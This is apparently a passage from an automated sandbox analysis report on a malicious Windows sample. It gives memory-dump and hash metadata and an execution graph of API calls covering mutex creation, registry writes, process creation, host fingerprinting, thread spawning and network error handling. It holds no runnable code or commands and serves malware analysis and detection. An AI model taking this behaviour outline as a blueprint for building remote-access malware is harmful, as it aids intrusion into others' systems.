                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _abort_free
                                                              • String ID: pF
                                                              • API String ID: 4174849134-2973420481
                                                              • Opcode ID: 27a83d5959e399e126d66fc0e9bc80bad5e8b5edace6ebc33031c21e2b203fc3
                                                              • Instruction ID: dba5d66ca7ddefb23688b8bfeec014953bf6cfc33dfc6716f72683c90607c71f
                                                              • Opcode Fuzzy Hash: 27a83d5959e399e126d66fc0e9bc80bad5e8b5edace6ebc33031c21e2b203fc3
                                                              • Instruction Fuzzy Hash: 1701F575D01A31DBC735AF6DC80031DB7A0FF94F21B18421AD96563280EF70AA0A9FC6
                                                              Function 02C145E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02C145F0
                                                                • Part of subcall function 02C14559: std::exception::exception.LIBCONCRT ref: 02C14566
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 02C145FE
                                                                • Part of subcall function 02C14EB1: ___crtInitializeCriticalSectionEx.LIBCPMT ref: 02C14EBE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalException@8InitializeSectionThrow___crtstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                              • String ID: 8:G
                                                              • API String ID: 64778976-405301104
                                                              • Opcode ID: 54ad04d6290442f5c1206a837fb498cdab3685317d9be234a4d03e3ffe6d53cd
                                                              • Instruction ID: 2c481558870a2992381cac547ed59b2db52a77b7174fb7095fbc83b92280e772
                                                              • Opcode Fuzzy Hash: 54ad04d6290442f5c1206a837fb498cdab3685317d9be234a4d03e3ffe6d53cd
                                                              • Instruction Fuzzy Hash: B0E0D836D00124B78718B67DBC069DE73ED8E473247400433EA14E3081FBA49D4669DE
                                                              Function 02B9AD64 Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B9AD98
                                                              • IsBadWritePtr.KERNEL32(?,00000004), ref: 02B9ADC8
                                                              • IsBadReadPtr.KERNEL32(?,00000008), ref: 02B9ADE7
                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B9ADF3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Read$Write
                                                              • String ID:
                                                              • API String ID: 3448952669-0
                                                              • Opcode ID: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                              • Instruction ID: 97d01d2c2ef992594f9a9b27b11ef196e9b375d8277034a169d8aa97b584b2c6
                                                              • Opcode Fuzzy Hash: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                              • Instruction Fuzzy Hash: E92184B1A40219DBDF10DF69CC80BAE77B9EF44352F1042A1EE5497344EB34D911DAA0

                                                              Execution Graph

                                                              Execution Coverage:4%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:4.6%
                                                              Total number of Nodes:1574
                                                              Total number of Limit Nodes:62
                                                              execution_graph 45551 30b479b 45552 30b47b0 45551->45552 45563 30b4842 45551->45563 45553 30b48d2 45552->45553 45554 30b48f9 45552->45554 45557 30b4832 45552->45557 45559 30b48a7 45552->45559 45560 30b47fd 45552->45560 45552->45563 45566 30b4872 45552->45566 45579 30b2c92 48 API calls _Yarn 45552->45579 45553->45554 45553->45563 45567 30b3896 45553->45567 45554->45563 45584 30b3f0a 28 API calls 45554->45584 45557->45563 45557->45566 45581 30b2c92 48 API calls _Yarn 45557->45581 45559->45553 45583 30b34a5 21 API calls 45559->45583 45560->45557 45560->45563 45580 30ad921 52 API calls 45560->45580 45566->45559 45566->45563 45582 30ad921 52 API calls 45566->45582 45568 30b38b5 ___scrt_fastfail 45567->45568 45571 30b38c4 45568->45571 45577 30b38e9 45568->45577 45585 30ac970 21 API calls 45568->45585 45569 30b38c9 45575 30b38d2 45569->45575 45569->45577 45592 30ab814 48 API calls 45569->45592 45571->45569 45571->45577 45586 30ae38d 45 API calls 45571->45586 45574 30b396c 45574->45577 45587 30c0c79 45574->45587 45575->45577 45593 30b2aba 21 API calls 2 library calls 45575->45593 45577->45554 45579->45560 45580->45560 45581->45566 45582->45566 45583->45553 45584->45563 45585->45571 45586->45574 45588 30c0c87 45587->45588 45589 30c0c83 45587->45589 45594 30c9adb 45588->45594 45589->45569 45592->45575 45593->45577 45599 30d3649 ___crtLCMapStringA 45594->45599 45595 30d3687 45602 30cad91 20 API calls _free 45595->45602 45597 30d3672 RtlAllocateHeap 45598 30c0c8c 45597->45598 45597->45599 45598->45569 45599->45595 45599->45597 45601 30d0480 7 API calls 2 library calls 45599->45601 45601->45599 45602->45598 45603 30c263c 45604 30c2648 ___BuildCatchObject 45603->45604 45630 30c234b 45604->45630 45606 30c264f 45608 30c2678 45606->45608 45904 30c27ae IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 45606->45904 45615 30c26b7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 45608->45615 45641 30d1763 45608->45641 45612 30c2697 ___BuildCatchObject 45619 30c2717 45615->45619 45906 30d08e7 35 API calls 4 library calls 45615->45906 45645 30c28c9 45619->45645 45631 30c2354 45630->45631 45911 30c29da IsProcessorFeaturePresent 45631->45911 45633 30c2360 45912 30c6cd1 10 API calls 4 library calls 45633->45912 45635 30c2365 45636 30c2369 45635->45636 45913 30d15bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 45635->45913 45636->45606 45638 30c2372 45639 30c2380 45638->45639 45914 30c6cfa 8 API calls 3 library calls 45638->45914 45639->45606 45642 30d177a 45641->45642 45915 30c2d4b 45642->45915 45644 30c2691 45644->45612 45905 30d1707 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 45644->45905 45923 30c4c30 45645->45923 45647 30c28dc GetStartupInfoW 45648 30c271d 45647->45648 45649 30d16b4 45648->45649 45925 30dc239 45649->45925 45651 30d16bd 45653 30c2726 45651->45653 45929 30d3d25 35 API calls 45651->45929 45654 309d3f0 45653->45654 45931 30aa8da LoadLibraryA GetProcAddress 45654->45931 45656 309d40c 45938 309dd83 45656->45938 45658 309d415 45953 30920d6 45658->45953 45661 30920d6 28 API calls 45662 309d433 45661->45662 45959 30a9d87 45662->45959 45666 309d445 45985 3091e6d 45666->45985 45668 309d44e 45669 309d4b8 45668->45669 45670 309d461 45668->45670 45991 3091e45 45669->45991 46238 309e609 116 API calls 45670->46238 45673 309d4c6 45677 3091e45 28 API calls 45673->45677 45674 309d473 45675 3091e45 28 API calls 45674->45675 45676 309d47f 45675->45676 46239 309f98d 36 API calls __EH_prolog 45676->46239 45678 309d4e5 45677->45678 45996 30952fe 45678->45996 45681 309d4f4 46001 3098209 45681->46001 45682 309d491 46240 309e5ba 77 API calls 45682->46240 45686 309d49a 46241 309dd70 70 API calls 45686->46241 45695 3091fb8 11 API calls 45696 309d520 45695->45696 45697 3091e45 28 API calls 45696->45697 45698 309d529 45697->45698 46018 3091fa0 45698->46018 45700 309d534 45701 3091e45 28 API calls 45700->45701 45702 309d54f 45701->45702 45703 3091e45 28 API calls 45702->45703 45705 309d569 45703->45705 45704 309d5cf 45706 3091e45 28 API calls 45704->45706 45705->45704 46242 309822a 45705->46242 45711 309d5dc 45706->45711 45708 309d594 45709 3091fc2 28 API calls 45708->45709 45710 309d5a0 45709->45710 45713 3091fb8 11 API calls 45710->45713 45712 309d650 45711->45712 45714 3091e45 28 API calls 45711->45714 45717 309d660 CreateMutexA GetLastError 45712->45717 45715 309d5a9 45713->45715 45716 309d5f5 45714->45716 46247 30a1f34 RegOpenKeyExA 45715->46247 45722 309d5fc OpenMutexA 45716->45722 45718 309d67f GetModuleFileNameW 45717->45718 45719 309d991 45717->45719 46022 30a92ae 45718->46022 45720 3091fb8 11 API calls 45719->45720 45747 309d99a ___scrt_fastfail 45720->45747 45726 309d60f WaitForSingleObject CloseHandle 45722->45726 45727 309d622 45722->45727 45726->45727 45730 30a1f34 3 API calls 45727->45730 45728 309d6a0 45731 309d6f5 45728->45731 45732 3091e45 28 API calls 45728->45732 45729 309dd0f 46329 30a239a 30 API calls 45729->46329 45738 309d63b 45730->45738 45734 3091e45 28 API calls 45731->45734 45743 309d6bf 45732->45743 45736 309d720 45734->45736 45735 309dd22 46330 30a0eda 65 API calls ___scrt_fastfail 45735->46330 45740 309d72c 45736->45740 45741 309d731 45736->45741 45738->45712 46250 30a239a 30 API calls 45738->46250 45739 309dcfa 45746 3092073 28 API calls 45739->45746 45770 309dd6a 45739->45770 46254 309e501 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 45740->46254 45745 3091e45 28 API calls 45741->45745 45743->45731 45748 309d6f7 45743->45748 45753 309d6db 45743->45753 45755 309d73a 45745->45755 45749 309dd3a 45746->45749 46316 30a20e8 RegOpenKeyExA 45747->46316 46252 30a1eea RegOpenKeyExA RegQueryValueExA RegCloseKey 45748->46252 46149 30952dd 45749->46149 45753->45731 46251 30967a0 36 API calls ___scrt_fastfail 45753->46251 45754 3092073 28 API calls 45758 309dd59 45754->45758 45762 3091e45 28 API calls 45755->45762 45761 30a94da 79 API calls 45758->45761 45759 309d70d 45759->45731 45763 309d712 45759->45763 45760 309d9ec 45764 3091e45 28 API calls 45760->45764 45765 309dd5e 45761->45765 45766 309d755 45762->45766 46253 30966a6 58 API calls 45763->46253 45768 309da10 45764->45768 45769 3091fb8 11 API calls 45765->45769 45772 3091e45 28 API calls 45766->45772 46049 3092073 45768->46049 45769->45770 46154 30a3980 45770->46154 45775 309d76f 45772->45775 45774 309dd6f 45777 3091e45 28 API calls 45775->45777 45776 309da22 46055 30a215f RegCreateKeyA 45776->46055 45778 309d789 45777->45778 45782 3091e45 28 API calls 45778->45782 45781 3091e45 28 API calls 45783 309da44 45781->45783 45786 309d7a3 45782->45786 46061 30c9867 45783->46061 45787 309d810 45786->45787 45789 3091e45 28 API calls 45786->45789 45787->45747 45790 309d828 45787->45790 45827 309d8a7 ___scrt_fastfail 45787->45827 45788 309da61 46319 30aaa4f 81 API calls ___scrt_fastfail 45788->46319 45799 309d7b8 _wcslen 45789->45799 45792 3091e45 28 API calls 45790->45792 45791 309da7e 45794 3092073 28 API calls 45791->45794 45795 309d831 45792->45795 45797 309da8d 45794->45797 45801 3091e45 28 API calls 45795->45801 45796 309da70 CreateThread 45796->45791 45798 3092073 28 API calls 45797->45798 45800 309da9c 45798->45800 45799->45787 45803 3091e45 28 API calls 45799->45803 46065 30a94da 45800->46065 45804 309d843 45801->45804 45806 309d7d3 45803->45806 45809 3091e45 28 API calls 45804->45809 45810 3091e45 28 API calls 45806->45810 45807 3091e45 28 API calls 45808 309daad 45807->45808 45812 3091e45 28 API calls 45808->45812 45811 309d855 45809->45811 45813 309d7e8 45810->45813 45815 3091e45 28 API calls 45811->45815 45814 309dabf 45812->45814 46255 309c5ed 45813->46255 45818 3091e45 28 API calls 45814->45818 45817 309d87e 45815->45817 45822 3091e45 28 API calls 45817->45822 45820 309dad5 45818->45820 45826 3091e45 28 API calls 45820->45826 45821 3091ef3 28 API calls 45823 309d807 45821->45823 45824 309d88f 45822->45824 45825 3091ee9 11 API calls 45823->45825 46313 309b871 46 API calls _wcslen 45824->46313 45825->45787 45828 309daf5 45826->45828 46039 30a2338 45827->46039 45833 30c9867 _strftime 39 API calls 45828->45833 45831 309d942 ctype 45836 3091e45 28 API calls 45831->45836 45832 309d89f 45832->45827 45834 309db02 45833->45834 45835 3091e45 28 API calls 45834->45835 45837 309db0d 45835->45837 45838 309d959 45836->45838 45839 3091e45 28 API calls 45837->45839 45838->45760 45840 309d96d 45838->45840 45841 309db1e 45839->45841 45842 3091e45 28 API calls 45840->45842 46089 3098f1f 45841->46089 45843 309d976 45842->45843 46314 30a9bca 28 API calls 45843->46314 45846 309d982 46315 309de34 88 API calls 45846->46315 45849 3091e45 28 API calls 45851 309db3c 45849->45851 45850 309d987 45850->45719 45850->45760 45852 309db4a 45851->45852 45853 309db83 45851->45853 46320 30c229f 45852->46320 45855 3091e45 28 API calls 45853->45855 45857 309db91 45855->45857 45860 309dbd9 45857->45860 45861 309db9c 45857->45861 45858 3091e45 28 API calls 45859 309db65 45858->45859 45863 309db6c CreateThread 45859->45863 45862 3091e45 28 API calls 45860->45862 45864 30c229f new 22 API calls 45861->45864 45865 309dbe2 45862->45865 45863->45853 47049 30a7f6a 101 API calls 2 library calls 45863->47049 45866 309dba5 45864->45866 45869 309dbed 45865->45869 45870 309dc4c 45865->45870 45867 3091e45 28 API calls 45866->45867 45868 309dbb6 45867->45868 45871 309dbbd CreateThread 45868->45871 45873 3091e45 28 API calls 45869->45873 45872 3091e45 28 API calls 45870->45872 45871->45860 47053 30a7f6a 101 API calls 2 library calls 45871->47053 45874 309dc55 45872->45874 45875 309dbfc 45873->45875 45876 309dc99 45874->45876 45877 309dc60 45874->45877 45878 3091e45 28 API calls 45875->45878 46126 30a95f8 GetComputerNameExW GetUserNameW 45876->46126 45880 3091e45 28 API calls 45877->45880 45881 309dc11 45878->45881 45883 309dc69 45880->45883 46327 309c5a1 31 API calls 45881->46327 45887 3091e45 28 API calls 45883->45887 45890 309dc7e 45887->45890 45888 309dc24 45891 3091ef3 28 API calls 45888->45891 45900 30c9867 _strftime 39 API calls 45890->45900 45893 309dc30 45891->45893 45898 3091ee9 11 API calls 45893->45898 45894 309dcc1 SetProcessDEPPolicy 45895 309dcc4 CreateThread 45894->45895 45896 309dcd9 CreateThread 45895->45896 45897 309dce5 45895->45897 47022 309e18d 45895->47022 45896->45897 47050 30a0b5c 135 API calls 45896->47050 45897->45739 45899 309dcee CreateThread 45897->45899 45901 309dc39 CreateThread 45898->45901 45899->45739 47051 30a1140 38 API calls ___scrt_fastfail 45899->47051 45902 309dc8b 45900->45902 45901->45870 47052 3091bc9 49 API calls _strftime 45901->47052 46328 309b0a3 7 API calls 45902->46328 45904->45606 45905->45615 45906->45619 45911->45633 45912->45635 45913->45638 45914->45636 45916 30c2d54 45915->45916 45917 30c2d56 IsProcessorFeaturePresent 45915->45917 45916->45644 45919 30c2d98 45917->45919 45922 30c2d5c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 45919->45922 45921 30c2e7b 45921->45644 45922->45921 45924 30c4c47 45923->45924 45924->45647 45924->45924 45926 30dc24b 45925->45926 45927 30dc242 45925->45927 45926->45651 45930 30dc138 48 API calls 4 library calls 45927->45930 45929->45651 45930->45926 45932 30aa919 LoadLibraryA GetProcAddress 45931->45932 45933 30aa909 GetModuleHandleA GetProcAddress 45931->45933 45934 30aa947 GetModuleHandleA GetProcAddress 45932->45934 45935 30aa937 GetModuleHandleA GetProcAddress 45932->45935 45933->45932 45936 30aa95f GetModuleHandleA GetProcAddress 45934->45936 45937 30aa973 24 API calls 45934->45937 45935->45934 45936->45937 45937->45656 46331 30a9493 FindResourceA 45938->46331 45941 30c9adb new 21 API calls 45942 309ddad _Yarn 45941->45942 46334 3092097 45942->46334 45945 3091fc2 28 API calls 45946 309ddd3 45945->45946 45947 3091fb8 11 API calls 45946->45947 45948 309dddc 45947->45948 45949 30c9adb new 21 API calls 45948->45949 45950 309dded _Yarn 45949->45950 46340 30962ee 45950->46340 45952 309de20 45952->45658 45954 30920ec 45953->45954 45955 30923ae 11 API calls 45954->45955 45956 3092106 45955->45956 45957 3092549 28 API calls 45956->45957 45958 3092114 45957->45958 45958->45661 46392 30920bf 45959->46392 45961 30a9d9a 45964 30a9e0c 45961->45964 45973 3091fc2 28 API calls 45961->45973 45976 3091fb8 11 API calls 45961->45976 45980 30a9e0a 45961->45980 46396 3094182 45961->46396 46399 30aab9a 28 API calls 45961->46399 45962 3091fb8 11 API calls 45963 30a9e3c 45962->45963 45965 3091fb8 11 API calls 45963->45965 45966 3094182 28 API calls 45964->45966 45968 30a9e44 45965->45968 45969 30a9e18 45966->45969 45970 3091fb8 11 API calls 45968->45970 45972 3091fc2 28 API calls 45969->45972 45971 309d43c 45970->45971 45981 309e563 45971->45981 45974 30a9e21 45972->45974 45973->45961 45975 3091fb8 11 API calls 45974->45975 45977 30a9e29 45975->45977 45976->45961 46400 30aab9a 28 API calls 45977->46400 45980->45962 45982 309e56f 45981->45982 45984 309e576 45981->45984 46407 3092143 11 API calls 45982->46407 45984->45666 45986 3092143 45985->45986 45990 309217f 45986->45990 46408 3092710 11 API calls 45986->46408 45988 3092164 46409 30926f2 11 API calls std::_Deallocate 45988->46409 45990->45668 45992 3091e4d 45991->45992 45993 3091e55 45992->45993 46410 3092138 28 API calls 45992->46410 45993->45673 45995 3091e6c 45997 30920bf 11 API calls 45996->45997 45998 309530a 45997->45998 46411 3093280 45998->46411 46000 3095326 46000->45681 46415 30951cf 46001->46415 46003 3098217 46419 3092035 46003->46419 46006 3091fc2 46007 3091fd1 46006->46007 46014 3092019 46006->46014 46008 30923ae 11 API calls 46007->46008 46009 3091fda 46008->46009 46010 309201c 46009->46010 46012 3091ff5 46009->46012 46011 309265a 11 API calls 46010->46011 46011->46014 46451 3093078 28 API calls 46012->46451 46015 3091fb8 46014->46015 46016 30923ae 11 API calls 46015->46016 46017 3091fc1 46016->46017 46017->45695 46019 3091fa9 46018->46019 46020 3091fb2 46018->46020 46452 30925c0 28 API calls 46019->46452 46020->45700 46453 30a9f23 46022->46453 46027 3091fc2 28 API calls 46028 30a92ea 46027->46028 46029 3091fb8 11 API calls 46028->46029 46030 30a92f2 46029->46030 46031 30a1f91 31 API calls 46030->46031 46033 30a9348 46030->46033 46032 30a931b 46031->46032 46034 30a9326 StrToIntA 46032->46034 46033->45728 46035 30a933d 46034->46035 46036 30a9334 46034->46036 46038 3091fb8 11 API calls 46035->46038 46461 30aaccf 22 API calls 46036->46461 46038->46033 46040 30a2356 46039->46040 46041 30962ee 28 API calls 46040->46041 46042 30a236b 46041->46042 46043 30920d6 28 API calls 46042->46043 46044 30a237b 46043->46044 46045 30a215f 14 API calls 46044->46045 46046 30a2385 46045->46046 46047 3091fb8 11 API calls 46046->46047 46048 30a2392 46047->46048 46048->45831 46050 309207b 46049->46050 46051 30923ae 11 API calls 46050->46051 46052 3092086 46051->46052 46462 30924cd 46052->46462 46056 30a21af 46055->46056 46058 30a2178 46055->46058 46057 3091fb8 11 API calls 46056->46057 46059 309da38 46057->46059 46060 30a218a RegSetValueExA RegCloseKey 46058->46060 46059->45781 46060->46056 46062 30c9880 _strftime 46061->46062 46466 30c8bbe 46062->46466 46064 309da51 46064->45788 46064->45791 46066 30a958b 46065->46066 46067 30a94f0 GetLocalTime 46065->46067 46069 3091fb8 11 API calls 46066->46069 46068 30952fe 28 API calls 46067->46068 46070 30a9532 46068->46070 46071 30a9593 46069->46071 46072 3098209 28 API calls 46070->46072 46073 3091fb8 11 API calls 46071->46073 46074 30a953e 46072->46074 46075 309daa1 46073->46075 46494 3092ef0 46074->46494 46075->45807 46078 3098209 28 API calls 46079 30a9556 46078->46079 46499 30a928b 76 API calls 46079->46499 46081 30a9564 46082 3091fb8 11 API calls 46081->46082 46083 30a9570 46082->46083 46084 3091fb8 11 API calls 46083->46084 46085 30a9579 46084->46085 46086 3091fb8 11 API calls 46085->46086 46087 30a9582 46086->46087 46088 3091fb8 11 API calls 46087->46088 46088->46066 46503 3091f66 46089->46503 46091 3098f36 _wcslen 46092 3098f49 46091->46092 46093 3098f60 46091->46093 46094 309c5ed 31 API calls 46092->46094 46095 309c5ed 31 API calls 46093->46095 46096 3098f51 46094->46096 46097 3098f68 46095->46097 46098 3091ef3 28 API calls 46096->46098 46099 3091ef3 28 API calls 46097->46099 46100 3098f5b 46098->46100 46101 3098f76 46099->46101 46104 3091ee9 11 API calls 46100->46104 46102 3091ee9 11 API calls 46101->46102 46103 3098f7e 46102->46103 46535 30981c7 28 API calls 46103->46535 46106 3098fb5 46104->46106 46108 3098ffb 46106->46108 46109 3098fdc 46106->46109 46107 3098f90 46536 3092ff4 46107->46536 46507 3098098 46108->46507 46112 3098fe1 46109->46112 46113 3099013 46109->46113 46117 3098098 28 API calls 46112->46117 46116 3091ee9 11 API calls 46113->46116 46121 309901b 46116->46121 46118 3098fef 46117->46118 46541 30992ba 29 API calls 46118->46541 46119 3091ef3 28 API calls 46123 3098fa5 46119->46123 46121->45849 46125 3091ee9 11 API calls 46123->46125 46124 3098ff9 46124->46113 46125->46100 46726 309415e 46126->46726 46131 3092ff4 28 API calls 46132 30a965d 46131->46132 46133 3091ee9 11 API calls 46132->46133 46134 30a9666 46133->46134 46135 3091ee9 11 API calls 46134->46135 46136 309dca2 46135->46136 46137 3091ef3 46136->46137 46138 3091f02 46137->46138 46145 3091f4a 46137->46145 46139 3092232 11 API calls 46138->46139 46140 3091f0b 46139->46140 46141 3091f4d 46140->46141 46143 3091f26 46140->46143 46142 3092316 11 API calls 46141->46142 46142->46145 46819 309303c 28 API calls 46143->46819 46146 3091ee9 46145->46146 46147 3092232 11 API calls 46146->46147 46148 3091ef2 46147->46148 46148->45894 46148->45895 46820 309533f 46149->46820 46151 30952eb 46152 3092035 11 API calls 46151->46152 46153 30952fa 46152->46153 46153->45754 46155 30920bf 11 API calls 46154->46155 46156 30a3994 46155->46156 46839 30a9894 46156->46839 46159 30920bf 11 API calls 46160 30a39aa 46159->46160 46161 3091e45 28 API calls 46160->46161 46162 30a39b8 46161->46162 46163 30c9867 _strftime 39 API calls 46162->46163 46164 30a39c5 46163->46164 46165 30a39ca Sleep 46164->46165 46166 30a39d7 46164->46166 46165->46166 46167 3092073 28 API calls 46166->46167 46168 30a39e6 46167->46168 46169 3091e45 28 API calls 46168->46169 46170 30a39ef 46169->46170 46171 30920d6 28 API calls 46170->46171 46172 30a39fa 46171->46172 46173 30a9d87 28 API calls 46172->46173 46174 30a3a02 46173->46174 46175 3091e45 28 API calls 46174->46175 46176 30a3a15 46175->46176 46177 3091e45 28 API calls 46176->46177 46185 30a3a94 46176->46185 46178 30a3a2e 46177->46178 46179 3091e45 28 API calls 46178->46179 46180 30a3a3f 46179->46180 46183 3091e45 28 API calls 46180->46183 46181 30a9d87 28 API calls 46181->46185 46182 3091e45 28 API calls 46182->46185 46184 30a3a50 46183->46184 46186 3091e45 28 API calls 46184->46186 46185->46181 46185->46182 46187 309822a 28 API calls 46185->46187 46189 3091fc2 28 API calls 46185->46189 46192 3091fb8 11 API calls 46185->46192 46196 30a94da 79 API calls 46185->46196 46198 30a3be2 WSAGetLastError 46185->46198 46200 30952dd 28 API calls 46185->46200 46204 30952fe 28 API calls 46185->46204 46205 3091e6d 11 API calls 46185->46205 46207 30a44a7 46185->46207 46212 3098098 28 API calls 46185->46212 46213 30cf34f 20 API calls 46185->46213 46214 30920d6 28 API calls 46185->46214 46215 30a20e8 3 API calls 46185->46215 46216 30a1f91 31 API calls 46185->46216 46217 309415e 28 API calls 46185->46217 46218 3091e45 28 API calls 46185->46218 46222 30a9b16 28 API calls 46185->46222 46225 30a9c8a 28 API calls 46185->46225 46227 3092e81 28 API calls 46185->46227 46228 3098209 28 API calls 46185->46228 46230 3092ef0 28 API calls 46185->46230 46232 3091ee9 11 API calls 46185->46232 46234 30a4423 46185->46234 46236 3092073 28 API calls 46185->46236 46237 30a4461 CreateThread 46185->46237 46843 30a393f 46185->46843 46849 3094f31 46185->46849 46861 30948a8 46185->46861 46920 30a97c1 46185->46920 46923 30a3013 46185->46923 46926 30a9ac6 46185->46926 46928 30a9a77 46185->46928 46933 309e2bb GetLocaleInfoA 46185->46933 46936 3092f11 28 API calls 46185->46936 46937 309826c 28 API calls 46185->46937 46938 3094a81 58 API calls _Yarn 46185->46938 46939 3094bf0 46185->46939 46960 3094e06 87 API calls 46185->46960 46188 30a3a61 46186->46188 46187->46185 46190 3091e45 28 API calls 46188->46190 46189->46185 46191 30a3a72 46190->46191 46193 3091e45 28 API calls 46191->46193 46192->46185 46194 30a3a84 46193->46194 46957 309471d 88 API calls 46194->46957 46196->46185 46958 30aa86b 30 API calls 46198->46958 46200->46185 46204->46185 46205->46185 46206 3091e45 28 API calls 46206->46207 46207->46206 46208 30c9867 _strftime 39 API calls 46207->46208 46209 30a44bf Sleep 46208->46209 46209->46185 46212->46185 46213->46185 46214->46185 46215->46185 46216->46185 46217->46185 46219 30a3e7b GetTickCount 46218->46219 46220 30a9b16 28 API calls 46219->46220 46220->46185 46222->46185 46225->46185 46227->46185 46228->46185 46230->46185 46232->46185 46959 3099f9a 84 API calls 46234->46959 46236->46185 46237->46185 46238->45674 46239->45682 46240->45686 46243 30920bf 11 API calls 46242->46243 46244 3098236 46243->46244 46245 3093280 28 API calls 46244->46245 46246 3098253 46245->46246 46246->45708 46248 309d5c5 46247->46248 46249 30a1f5e RegQueryValueExA RegCloseKey 46247->46249 46248->45704 46248->45729 46249->46248 46250->45712 46251->45731 46252->45759 46253->45731 46254->45741 46256 3091f66 11 API calls 46255->46256 46257 309c609 46256->46257 46258 309c629 46257->46258 46259 309c65e 46257->46259 46261 309c61f 46257->46261 47013 30a959f 29 API calls 46258->47013 46262 30a9f23 GetCurrentProcess 46259->46262 46260 309c752 GetLongPathNameW 46264 309415e 28 API calls 46260->46264 46261->46260 46265 309c663 46262->46265 46267 309c767 46264->46267 46268 309c6b9 46265->46268 46269 309c667 46265->46269 46266 309c632 46270 3091ef3 28 API calls 46266->46270 46271 309415e 28 API calls 46267->46271 46272 309415e 28 API calls 46268->46272 46273 309415e 28 API calls 46269->46273 46274 309c63c 46270->46274 46275 309c776 46271->46275 46276 309c6c7 46272->46276 46277 309c675 46273->46277 46279 3091ee9 11 API calls 46274->46279 47016 309c7f9 28 API calls 46275->47016 46282 309415e 28 API calls 46276->46282 46283 309415e 28 API calls 46277->46283 46279->46261 46280 309c789 47017 3092f85 28 API calls 46280->47017 46285 309c6dd 46282->46285 46286 309c68b 46283->46286 46284 309c794 47018 3092f85 28 API calls 46284->47018 47015 3092f85 28 API calls 46285->47015 47014 3092f85 28 API calls 46286->47014 46290 309c79e 46293 3091ee9 11 API calls 46290->46293 46291 309c6e8 46294 3091ef3 28 API calls 46291->46294 46292 309c696 46295 3091ef3 28 API calls 46292->46295 46296 309c7a8 46293->46296 46297 309c6f3 46294->46297 46298 309c6a1 46295->46298 46300 3091ee9 11 API calls 46296->46300 46301 3091ee9 11 API calls 46297->46301 46299 3091ee9 11 API calls 46298->46299 46303 309c6aa 46299->46303 46304 309c7b1 46300->46304 46302 309c6fc 46301->46302 46305 